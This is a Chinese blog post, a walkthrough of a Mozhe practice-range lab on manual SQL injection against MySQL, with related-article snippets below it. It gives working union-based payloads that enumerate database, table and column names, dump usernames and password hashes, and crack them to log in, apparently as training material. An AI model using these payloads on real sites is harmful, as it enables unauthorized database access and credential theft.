SQL手工注入漏洞测试(MySQL数据库)

已于 2023-12-25 19:12:36 修改
阅读量908 收藏 12
点赞数 8
分类专栏: WEB漏洞—SQL注入 文章标签: 数据库 sql 安全 linux mysql web安全
于 2023-12-25 19:12:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61861243/article/details/135206288
版权

一、实验平台

https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe

二、实验目标

获取到网站的KEY,并提交完成靶场。

三、实验步骤

①、启动靶机,进行访问查找可能存在注入的页面

②、通过测试判断注入点的位置(id=)

(1)、注入点的判断方式      and 1=1 页面正常        and 1=2 页面错误

(2)、可能存在注入,随意填写(说明id =1 后边有注入点)(拼写的语句是为了测试你写的语句有没有带入到数据库执行,有影响说明带入数据库查询,所以 说明有注入点。)

③、猜解列名数量(字段数)order by x (错误与正常的正常值)

通过测试4没错,5错误,说明列名数量为4

http://124.70.64.48:41613/new_list.php?id=-1 union select 1,2,3,4

④、信息收集获取网站的数据库版本、数据库名字等

数据库版本 version()     5.7.22-0ubuntu0.16.04.1(5.0以上高版本,)

数据库名字database()    mozhe_Discuz_StormGroup

数据库用户user()    root@localhost

操作系统@@version_compile_os      Linux

⑤、查询指定数据库名mozhe_Discuz_StormGroup下边第一个表名信息

union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

⑥、查询指定表名下的列名信息(查询有哪些列名)

union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

⑦、查询指定列名下数据:

union select 1,name,password,4 from StormGroup_member

这里我们得到一个用户名,还有一串数字,我们根据靶场提示,可知利用md5解密然后我们登录发现并不对,后来经过查找才知道上边的语句只显示第一行数据。

⑧、猜解多个数据可以采用limit x,1变动猜解(列名下的数据有多行时候可以变动猜解)

union select 1,name,password,4 from StormGroup_member  limit 0,1

union select 1,name,password,4 from StormGroup_member  limit 1,1

这里我们发现一个新的密码,然后解密试着登录一下 

⑨、果然利用第二种方法查找的密码是正确的,接下来我们将靶场拿下拿到我们所需要提交的KEY

Krismile☜
关注
  • 8
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
weixin_42939822的博客
03-16 3583
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
SQL注入手工检测sql注入检测
04-21
sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测
渗透测试SQL注入
最新发布
CheatMyself的博客
06-25 1813
按照攻击类型分为:联合查询注入、布尔注入、时间延迟注入、报错型注入、堆叠型注入等按照注入位置分为:HTTP头注入、请求参数注入等按照数据库场景分为:MySQL注入、MSSQL注入、Oracle场景注入
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)...SQL手工注入漏洞测试(MySQL数据库)、SQL注入漏洞测试(delete注入)、SQL过滤字符后手工注入漏洞测试、延时注入(时间注入)等...
SQL注入漏洞发现和数据库监控系统.zip
05-27
SQL注入漏洞是网络安全领域中的一个重要话题,它主要发生在应用程序与数据库交互时,由于不恰当的输入验证导致恶意用户能够执行自定义SQL命令。本篇将深入探讨SQL注入漏洞的发现、修补技术和数据库监控系统的应用。 ...
sql server 2008 mysql 手工注入
03-25
手工注入,特别是SQL注入,是一种常见的安全漏洞,它允许攻击者通过构造恶意SQL语句来操纵或获取数据库中的敏感信息。在这个主题中,我们将深入探讨这两种数据库系统的SQL注入及其防范方法。 首先,SQL注入的原理是...
手工注入常用SQL语句.txt
07-18
MySQL数据库手工SQL注入示例 MySQL是另一种流行的开源关系型数据库管理系统,在手工SQL注入时可以采用的方法包括: - `and length(user()) > 0`:判断目标系统是否使用MySQL。 - `and ord(mid(version(), 1, 1))...
SQL注入漏洞挖掘.pptx
10-27
SQL 注入漏洞测试方式可以分为两种:手工测试和自动化测试手工测试是指攻击者手动构造测试语句,并分析返回结果,以判断是否存在 SQL 注入漏洞手工测试的优点是灵活性高,测试范围广泛,但缺点是效率低,...
手工SQL注入入侵
zhdd1234的专栏
09-15 725
检测可否注入  http://127.0.0.1/xx?id=11 and 1=1 (正常页面)  http://127.0.0.1/xx?id=11 and 1=2 (出错页面)  检测表段的  http://127.0.0.1/xx?id=11 and exists (select * from admin)  检测字段的  http://127.0.0.1/xx?id
SQL手工注入总结
Fuzz
09-24 583
0x00、 前言 虽说目前互联网上已经有很多关于 sql 注入的神器了,但是在这个 WAF 横行的时代,手工注入往往在一些真实环境中会显得尤为重要。本文主要把以前学过的知识做个总结,不会有详细的知识解读,类似于查询手册的形式,便于以后的复习与查阅,文中内容可能会存在错误,望师傅们斧正!! 0x01、 Mysql 手工注入 1.1 联合注入 - ?id=1' order by 4--+ - ?id=0' union select 1,2,3,database()--+ - ?id=0' union se
手工注入测试MySQL
weixin_44926231的博客
06-25 737
个人学习笔记之手工注入测试 环境:https://www.mozhe.cn/bug/detail/82 环境:Nginx+PHP+MySQL 这是墨者学院的一个测试题,让我们用手工的方式对数据库进行注入得到信息登陆,拿到key。 注入原理 参数用户可控。 参数未过滤就带入数据库查询。 凡是满足这两点,皆可产生注入漏洞,攻击者进一步构造payload进行拼接sql语句导致数据泄露,甚至网站、服务...
墨者 - SQL手工注入漏洞测试(MySQL数据库)
吃肉唐僧的博客
07-02 725
/new_list.php?id=1 and 1=1,判断id的类型值是数字类型 /new_list.php?id=1 order by 4,测出数据库有4个字段,第5个不回显 测出页面回显位置 2和3 /new_list.php?id=1 and 1=2 union select 1,2,3,4 爆库 /new_list.php?id=1 and 1=2 uni...
sql手工注入漏洞测试(mysql数据库)
06-28
### 回答1: SQL手工注入漏洞测试是一种常见的安全测试方法,主要针对MySQL数据库。通过手动输入恶意代码,测试系统是否存在SQL注入漏洞,以此来发现和修复系统的安全漏洞。这种测试方法需要有一定的技术水平和经验,同时也需要谨慎操作,避免对系统造成不必要的损害。 ### 回答2: SQL注入是一种常见的Web安全问题。手工注入漏洞测试是指通过手动输入恶意代码和查询语句来检测数据库使用SQL语言的Web应用程序中的SQL注入漏洞MySQL是一种广泛使用的关系型数据库,常用于开发Web应用程序。在手工注入漏洞测试mysql数据库时,需要按照以下步骤进行: 1.确定数据输入点:首先需要确定应用程序的哪些输入点与数据存储在mysql数据库中,包括表单、页面参数、Cookie等。 2.构造查询语句:通过使用常见的SQL语句操作符如SELECT、INSERT、UPDATE、DELETE、FROM等来构造查询语句。 3.注入恶意代码:通过向查询语句中添加恶意代码来尝试绕过应用程序的安全检测措施,如添加单引号、尝试注入逻辑运算符等。 4.验证漏洞:利用注入所添加的代码来验证是否存在漏洞,如出现错误信息、显示数据库信息、登录成功等。 5.利用漏洞:如果存在漏洞,可以通过利用注入的恶意代码执行恶意操作,如删除或修改数据库中的记录、获取敏感数据等。 为了避免手工注入漏洞测试mysql数据库时可能造成的安全隐患,应遵守以下安全措施: 1.遵循最小权限原则,只为测试者授予尽可能少的权限。 2.使用测试环境,不要在生产环境中进行注入测试。 3.备份数据库,以便在发生注入攻击时恢复数据。 4.使用专业的安全测试工具进行测试测试后删除所有测试数据。 通过手工注入漏洞测试mysql数据库,可以发现并修复SQL注入漏洞,提高Web应用程序的安全性。 ### 回答3: SQL手工注入漏洞是一种常见的漏洞,它允许攻击者利用可疑的输入向数据库发送恶意代码。MySQL是一种受广泛使用的关系数据库管理系统,虽然它提供了多种安全性功能,但仍然可能受到SQL手工注入攻击。 在测试SQL手工注入漏洞之前,我们需要了解如何识别这种漏洞。通常,我们看到以下迹象表明可能存在SQL注入漏洞: 1.在输入字段中注入特定的字符,例如单引号、双引号、括号等。 2.如果发送的请求返回了未知错误或异常结果。 3.能够看到不该出现在页面上的数据,例如数据库错误会返回PDOException. 测试步骤如下: 1.了解数据库结构,以便确认注入目标。我们需要知道要查询的表或字段。 2.利用输入字段尝试注入代码,例如: a.输入单引号测试SQL注入:输入'或1=1--,如果页面没有崩溃,那么它很可能存在SQL注入漏洞。 b.输入union测试SQL注入:输入1' union select 1,2,3,4,5#,如果页面返回了这些数字,则漏洞很可能存在。 c.使用等待语句测试SQL注入:例如,输入1; waitfor delay '0:0:10'; --等待10秒钟,看是否有延迟。 3.测试其他注入语句,例如联合查询、嵌套查询、子查询等,来获得受攻击的目标。 4.通过分析返回数据或页面上所显示的任何异常信息来确定是否存在漏洞。如果数据很容易被修改或者异常信息明显且无法解释,则很可能存在漏洞。 在SQL手工注入漏洞测试过程中,我们需要格外小心,因为数据库中的数据可能是非常敏感的。测试过程应当只进行在特定环境下,并应该遵循公司安全政策。通过识别和修复SQL注入漏洞,可以大大提高应用程序的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值